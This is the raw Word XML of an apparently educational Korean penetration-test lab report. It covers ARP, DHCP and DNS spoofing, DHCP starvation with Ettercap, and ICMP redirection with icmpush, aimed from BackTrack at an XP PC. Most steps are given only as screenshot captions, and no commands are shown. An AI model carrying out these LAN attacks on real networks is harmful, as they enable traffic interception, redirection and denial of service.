          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를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능한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F821A1F" wp14:editId="0D30CD37">
            <wp:extent cx="3599179" cy="1584960"/>
            <wp:effectExtent l="0" t="0" r="190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 arpspoofing 공격을 시도했던 PC의 주소를 가상인터페이스에 입력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26" cy="1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19222FFC" wp14:editId="4F97A12D">
            <wp:extent cx="3599180" cy="164592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 arpspoofing공격으로 게이트웨이에게 자신이 경영기획부 PC라고 속이기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68" cy="1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G</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ateway</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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자신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</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>라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속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7662CFBA" wp14:editId="47C81505">
            <wp:extent cx="3634740" cy="1821180"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="52" name="그림 52" descr="https://lh4.googleusercontent.com/MxmDO0FqGdhdHI3NWeFiBq1LtSPg8kJhkN7BLFXgEkuDG54aA0TW3vlZYCSRc5Hl0bOMlFDoBjsqBoJnFqSvNO_dPh6xcZwSXBzQO0Z-RyQwFBbwNhOSHfcYu3G8xFw-bp9K9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xmDO0FqGdhdHI3NWeFiBq1LtSPg8kJhkN7BLFXgEkuDG54aA0TW3vlZYCSRc5Hl0bOMlFDoBjsqBoJnFqSvNO_dPh6xcZwSXBzQO0Z-RyQwFBbwNhOSHfcYu3G8xFw-bp9K9HMR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0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E2A1972" wp14:editId="501ED99E">
            <wp:extent cx="3611880" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="77" name="그림 77" descr="https://lh5.googleusercontent.com/w-9Y5bBi1ZyOUhiYaZTnNhKc_vMVJyaAaEOWLRmhArYicj9iI0jVWQp7hd49khsAjXwz99A6rTCjTfvtbpX-9NW_TAJY7FYfygwFrKGKMtVHIqKZSpy6FJ2ns7VTubntS5Vee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-9Y5bBi1ZyOUhiYaZTnNhKc_vMVJyaAaEOWLRmhArYicj9iI0jVWQp7hd49khsAjXwz99A6rTCjTfvtbpX-9NW_TAJY7FYfygwFrKGKMtVHIqKZSpy6FJ2ns7VTubntS5Veevv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–b </w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>옵션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인터페이스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부여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[10.10.20.10]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72175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10.10.100.20]</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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접근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DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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72175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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현황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했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 [10.10.20.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으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로그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되었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poofing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poofing</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란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 xml:space="preserve">HCP </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>프로토콜이 제공하는 정보를 공격자가 변조하여 공격 대상P</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 속이는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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>D</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HCP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격을 당하게 되면 공격자가 원하는 G</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ateway, DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버등을 변조하여 공격 대상 </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에게 보내 적용시킬 수 있음 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74DA58" wp14:editId="45E94F5D">
            <wp:extent cx="3599815" cy="1950720"/>
            <wp:effectExtent l="0" t="0" r="63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 경영기획부 PC로 DHCP서버에서 ip를 받을 수 있는지 확인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19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6DFE391" wp14:editId="1629FF01">
            <wp:extent cx="3599815" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="635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T에서 공격시도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22" cy="1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경영기획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직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비스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자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 Spoofing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37A2535C" wp14:editId="6964C5EA">
            <wp:extent cx="3599815" cy="1805940"/>
            <wp:effectExtent l="0" t="0" r="635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XP에서 DHCP를 할당받았을 때 BT으로 설정했던 것을 받아옴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9" cy="18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D185B26" wp14:editId="6A6D98FE">
            <wp:extent cx="3599815" cy="1805940"/>
            <wp:effectExtent l="0" t="0" r="63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XP에서 DHCP를 할당받았을 때 BT으로 설정했던 것을 받아옴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대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으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대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4D52EE" w:rsidRDefault="004D52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75F" w:rsidRDefault="0072175F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HCP Starvation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D52EE" w:rsidRPr="001E2DD9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D</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:t>HCP Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D52EE" w:rsidRPr="001E2DD9" w:rsidRDefault="001E2DD9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</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버의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 xml:space="preserve">할당대역을 모두 할당 받아오는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C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P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1E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격자가 모든 </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">주소를 할당 받아오게 되면 </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">들은 정상적인 </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 할당 받지 못해 네트워크에 참여할 수 없게 됨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5D6A93" wp14:editId="10CE6FC2">
            <wp:extent cx="3586480" cy="149352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 DHCP Starvation 공격을 위해 할당범위 조정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99" cy="14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F2CC175" wp14:editId="13066559">
            <wp:extent cx="3599327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BT에서 DHCP Starvation 공격 시도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57" cy="16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위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범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재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설정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Ettercap </w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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용해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공격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도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1B05AA" wp14:editId="4FF949A8">
            <wp:extent cx="4061460" cy="2544024"/>
            <wp:effectExtent l="0" t="0" r="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68846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F" w:rsidRPr="0072175F" w:rsidRDefault="0072175F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BT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공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내용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72175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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가지고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10.10.20.20</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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제외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나머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주소들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온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것을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수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있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072175F" w:rsidRDefault="0072175F" w:rsidP="0072175F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A940985" wp14:editId="2C3E1BFE">
            <wp:extent cx="3599180" cy="2046084"/>
            <wp:effectExtent l="0" t="0" r="127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 DHCP서버에서 제대로 아이피가 할당됐는지 확인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95" cy="20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2A8C587" wp14:editId="4FAEB76A">
            <wp:extent cx="3599180" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="127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 XP에서 DHCP할당받았을 때 실패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16" cy="24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E" w:rsidRPr="001E2DD9" w:rsidRDefault="0072175F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2175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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동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내역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확인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을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한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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>뒤</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F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XP</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서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에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보지만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DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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더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이상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할당하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못해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아이피를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받아오지</w:t>
      </w:r>
      <w:r w:rsidRPr="007217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175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227DB7" w:rsidRDefault="00227DB7" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:leftChars="0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D</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NS Spoofing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D</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:t>NS Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D52EE" w:rsidRPr="006A78F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C</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lient</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS Query</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 할 때 </w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버보다 먼저 응답하여 공격자가 의도한 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주소</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 알려주는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방법의 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D52EE" w:rsidRPr="006A78FE" w:rsidRDefault="004D52EE" w:rsidP="004D52E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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A78FE" w:rsidRPr="006A78FE" w:rsidRDefault="006A78FE" w:rsidP="006A78FE">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:leftChars="0" w:left="1120"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NS Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용해 공격 대상이 특정 사이트로 접근을 시도하면 공격자가 원하는 사이트로 </w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Redirect </w:t>
      </w:r>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>시켜줄 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A78FE" w:rsidRPr="006A78FE" w:rsidRDefault="006A78FE" w:rsidP="006A78FE">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006A78FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의 해킹 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227DB7" w:rsidRDefault="00227DB7" w:rsidP="00227DB7">
      <w:pPr>
        <w:ind w:left="785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9C846A" wp14:editId="7590A3E8">
            <wp:extent cx="3599650" cy="1772920"/>
            <wp:effectExtent l="0" t="0" r="127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. 공격을 위해 BT에 파일 생성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20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DA533AF" wp14:editId="15BC6F1C">
            <wp:extent cx="3599595" cy="2306320"/>
            <wp:effectExtent l="0" t="0" r="127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 공격을 위해 경영기획부 PC에게 자신이 게이트웨이라 속이고 포워딩 실시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60" cy="23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 xml:space="preserve">에서 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을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하고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를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대상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227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상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만들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C50AA5D" wp14:editId="6DA4A34D">
            <wp:extent cx="3599327" cy="1955800"/>
            <wp:effectExtent l="0" t="0" r="127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 공격 시작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70" cy="19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dnsspoof </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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용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 Spoofing </w:t>
      </w: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도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7F3D3A4" wp14:editId="300AE24B">
            <wp:extent cx="3600000" cy="3157200"/>
            <wp:effectExtent l="0" t="0" r="635" b="571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 XP에서 확인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81BA20B" wp14:editId="47243532">
            <wp:extent cx="3599180" cy="2118360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 BT에서 확인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564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로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가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이루어졌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  <w:r w:rsidRPr="00227DB7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진행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I</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CMP Redirection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I</w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:t>CMP Redirection</w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">메시지를 사용하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Target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 xml:space="preserve">Routing </w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>경로를 변경하여 P</w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 흐름을 조정하는 </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D52EE" w:rsidRPr="004D52EE" w:rsidRDefault="004D52EE" w:rsidP="004D52E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4D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 대상에게 </w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP Redirect </w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">메시지를 보내 대상 </w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Routing Table</w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 변경할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D52EE" w:rsidRPr="004D52EE" w:rsidRDefault="004D52E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4D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의 해킹 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227DB7" w:rsidRDefault="00227DB7" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3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227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>방향 전환 요청이 꺼져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>
            <wp:extent cx="3599529" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="127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20FEB9E" wp14:editId="77CEF1D9">
            <wp:extent cx="3599180" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="127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 xml:space="preserve">설정에 방향 전환 요청에 체크가 되어 있는지 확인 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FCC00D4" wp14:editId="30489FAE">
            <wp:extent cx="3599815" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="63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A7BE01B" wp14:editId="5D515D8C">
            <wp:extent cx="3599180" cy="1666240"/>
            <wp:effectExtent l="0" t="0" r="127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r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">icmpush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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00BFEBD9" wp14:editId="5DC7901D">
            <wp:extent cx="3599180" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="127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다시 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>로 돌아와 R</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outing Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 확인해보면 변동이 없는 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00227DB7" w:rsidRPr="00227DB7" w:rsidRDefault="00227DB7" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12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  <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방향 전환 요청이 켜져 있을 경우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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0764DC26" wp14:editId="435E63CA">
            <wp:extent cx="3599529" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="127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 반향 전환 요청이 꺼져있을 때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37E7416" wp14:editId="05386EA0">
            <wp:extent cx="3599180" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="127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 xml:space="preserve">공격대상의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 가서 방화벽 </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r w:rsidRPr="00227DB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
